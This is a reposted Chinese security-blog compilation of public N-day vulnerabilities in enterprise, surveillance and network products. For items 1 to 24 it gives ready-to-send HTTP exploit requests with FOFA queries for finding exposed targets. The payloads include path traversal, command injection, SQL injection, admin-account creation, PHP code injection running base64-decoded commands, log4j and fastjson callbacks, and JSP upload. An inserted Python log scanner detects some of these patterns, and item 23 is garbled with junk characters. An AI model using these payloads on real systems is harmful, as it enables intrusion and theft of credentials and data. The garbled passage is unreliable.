Public internet vulnerability compilation 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Public internet vulnerability compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive security, and we hope this article helps with everyone's defence. Defenders can use its contents to carry out risk checks.

Sources: the article covers 203 PoCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Article content: because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to get the full list". This article is already the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能S40 management platform import web.php arbitrary file upload
121. 北京百绰智能S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS video management system dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

PoC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default admin account, send the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request, which injects a function that executes base64-decoded input.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

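As an added defensive example (not part of the original post or any vendor's code), the following Python checks web-server access logs for the request shapes visible in PoCs 1 to 12 above: traversal that only appears after double URL-decoding, the `;.ico` path-suffix trick, a shell separator leading a query value, the log-viewer fetch that completes the Jorani chain, and hits on endpoints named in the PoCs. The log lines are constructed; rule names and the watched-path table are this example's own.

```python
import re
from urllib.parse import unquote, parse_qsl

# Combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Exact endpoints taken from PoCs 1, 3, 4, 6 and 7 above; a request for one of
# these from outside the management network deserves a look on its own.
WATCHED_PATHS = {
    "/mem_tracker": "StarRocks mem_tracker (PoC 1)",
    "/api/v1/userlist": "EasyCVR userlist (PoC 3)",
    "/api/v1/adduser": "EasyCVR adduser (PoC 4)",
    "/svpn_html/loadfile.php": "NGAF loadfile (PoC 6)",
    "/808gps/MobileAction_downLoad.action": "808gps downLoad (PoC 7)",
}

TRAVERSAL_RE = re.compile(r"(^|[/\\])\.\.([/\\]|$)")            # /../ after decoding (PoC 2)
SUFFIX_RE = re.compile(r";\.?\w+(/|$)")                        # getAllList;.ico style suffix
LOG_VIEW_RE = re.compile(r"^/pages/view/log-\d{4}-\d{2}-\d{2}$")  # Jorani log viewer fetch (PoC 12)
SHELL_LEAD_RE = re.compile(r"^\s*[;|&`]")                     # log=;whoami (PoC 5)


def decode_target(target: str):
    """Split the request target into path and query, URL-decoding twice so that
    %2e%2e and %252e%252e both normalise to '..' (PoC 9 relies on double encoding)."""
    path, _, query = target.partition("?")
    return unquote(unquote(path)), unquote(unquote(query))


def classify(path: str, query: str):
    """Return the list of rule names that fire for one decoded request."""
    hits = []
    if TRAVERSAL_RE.search(path):
        hits.append("path_traversal")
    if SUFFIX_RE.search(path):
        hits.append("semicolon_suffix")
    if LOG_VIEW_RE.match(path):
        hits.append("log_file_view")
    for _, value in parse_qsl(query, keep_blank_values=True):
        if SHELL_LEAD_RE.match(value):
            hits.append("shell_metachar_param")
            break
    if path in WATCHED_PATHS:
        hits.append("watched:" + WATCHED_PATHS[path])
    return hits


def scan_access_log(text: str):
    """Parse each log line and collect one finding per (line, rule)."""
    findings = []
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path, query = decode_target(m["target"])
        for rule in classify(path, query):
            findings.append({"line": lineno, "ip": m["ip"], "path": path, "rule": rule})
    return findings


# Constructed sample log (not from the original page); lines 7 is benign traffic.
SAMPLE_LOG = r"""
203.0.113.5 - - [05/Jun/2024:10:01:02 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:10:01:09 +0800] "GET /static/%252e%252e/%2e%2e/etc/passwd HTTP/1.1" 200 1423 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:10:02:31 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:10:02:40 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jun/2024:10:03:12 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 56 "-" "curl/8.0"
203.0.113.9 - - [05/Jun/2024:10:04:00 +0800] "GET /pages/view/log-2024-06-05 HTTP/1.1" 200 912 "-" "Mozilla/5.0"
198.51.100.2 - - [05/Jun/2024:10:05:00 +0800] "GET /static/css/app.css HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.2 - - [05/Jun/2024:10:05:01 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 401 0 "-" "Mozilla/5.0"
198.51.100.3 - - [05/Jun/2024:10:06:00 +0800] "GET /mem_tracker HTTP/1.1" 200 4402 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']:2d} {f['ip']:<13} {f['rule']:<32} {f['path']}")
```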
13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC智能物联综合管理平台 fastjson远程代码执行" U- o  a0 I* [4 k: J/ p1 C2 h
FOFA:icon_hash="-1935899595"7 H1 Y. q) j3 M( ^9 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
5 p5 Z! J9 m1 q; q& t) Z0 qHost: your-ip) O) D# f$ I& I" P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; M7 Y3 j. s2 BContent-Type: application/json;charset=utf-8# R: A, m9 w+ }4 {
Accept-Encoding: gzip9 f) N; u4 p) H
Connection: close: G+ o7 O  B+ w1 d2 S6 u

* A# Y' I$ x6 ^" U5 `$ A4 Y{
* N8 \2 ]3 [7 k. M    "a":{! c8 I7 |& G% ^( r; x: u2 t
        "@type":"com.alibaba.fastjson.JSONObject",6 `8 L6 }- r- F  w- Z& Y2 g
       {"@type":"java.net.URL","val":"http://DNSLOG"}
( O0 M1 o/ A( L% L* C# ]0 R; E        }""2 a# G2 r* e" e5 J- f3 x
}0 @4 @2 Y0 Q7 E3 N: h9 }; s! n) u9 @

  U% e5 Q' X. R, ]3 i! C8 M1 g4 L0 E
24. Yonyou NC 6.5 (用友NC) accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
